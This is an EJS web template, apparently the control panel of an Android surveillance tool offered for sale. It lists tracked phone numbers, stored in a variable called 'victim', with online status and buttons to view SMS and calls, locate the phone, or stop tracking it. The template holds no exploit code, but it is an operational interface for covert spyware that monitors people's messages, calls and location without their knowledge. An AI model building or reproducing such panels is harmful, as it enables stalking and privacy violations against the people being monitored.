<html lang="en">

<%- include header %>
<!-- Main component for a primary marketing message or call to action -->

<div class="container-fluid">

    <div class="row">
        <div class="col">
            <div class="card">
                <div class="card-body">
                    <h5 class="card-title">Phần mềm quản lý SMS, Call Recorder, Location Android</h5>
                    <h6 class="card-subtitle mb-2 text-muted">Quản lý tin nhắn SMS, Call thuê bao sử dụng Android</h6>
                    <p class="card-text">Contact: NamBean</p>
                </div>
            </div>
        </div>
    </div>
    <div class="row">
        <div class="col">
            <div class="card">
                <div class="card-body">
                    <h5 class="card-title">Danh sách thuê bao</h5>
                    <% if (message.length > 0) { %>
                    <div class="alert alert-success col-sm-12"><%= message %></div>
                    <% } %>
                    <div id="signupalert" style="display:none" class="alert alert-danger">
                        <p>Error:</p>
                        <span></span>
                    </div>
                    <table id="victim-table-list" class="table table-striped">
                        <thead>
                        <tr>
                            <th scope="col">#</th>
                            <th scope="col">Trạng thái</th>
                            <th scope="col">Thuê bao</th>
                            <th scope="col">Ngày tạo</th>
                            <th scope="col">Ngày cập nhật</th>
                            <th scope="col">Quản lý</th>
                            <th scope="col"></th>
                            <th scope="col"></th>
                        </tr>
                        </thead>
                        <tbody>
                        <%
                        for(var i=0; i < victim.length ; i++) { %>
                        <tr>
                            <th style=" width: 6%; " scope="row"><%= i+1 %></th>
                            <td style=" width: 6%; text-align: center;">
                                <%if (victim[i].status==0) {%>  <i class="fa fa-circle text-danger"></i>  <%}%>
                                <%if (victim[i].status==1) {%>  <i class="fa fa-circle text-success"></i>  <%}%>
                            </td>
                            <td><%= victim[i].sdt %></td>
                            <td><%= moment(victim[i].created_date).format( 'DD-MM-YYYY hh:mm:ss ')  %></td>
                            <td><%= moment(victim[i].update_date).format( 'DD-MM-YYYY hh:mm:ss ')  %></td>
                            <td><a class="btn btn-success btn-a-white">SMS / Call</a></td>
                            <td><a class="btn btn-info btn-a-white">Định vị</a></td>
                            <td><a class="btn btn-danger btn-a-white" href="../dashboard/delete/<%= victim[i].id %>" onclick="return confirm('Xóa theo dõi SĐT này?');">Xóa thuê bao</a></td>
                        </tr>
                        <% } %>
                        </tbody>
                    </table>
                </div>
            </div>
        </div>
    </div>

</div>
</div>

<script>
    $(document).ready(function () {
        $('#victim-table-list').DataTable({
            "paging": true,
            "ordering": true,
            "info": false
        });
    });
</script>

<!--<script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/2.1.1/socket.io.js"></script>

<script>
    $(function () {
        var socket = io.connect('http://localhost:3000');
        socket.on('connect', function(data) {
            socket.emit('user connect', $('#user').val());
        });

        socket.on('disconnect', function(user_disconnect) {
            socket.emit('user disconnect', $('#user').val());
        });


        $('form').submit(function(){
            socket.emit('chat message', $('#m').val(),$('#user').val());
            $('#m').val('');
            return false;
        });
        socket.on('chat message', function(msg,people){

            $('#messages').append($('<li>').text(msg));
            $('#user').val().text(people);
        });
    });
</script>-->
<%- include footer %>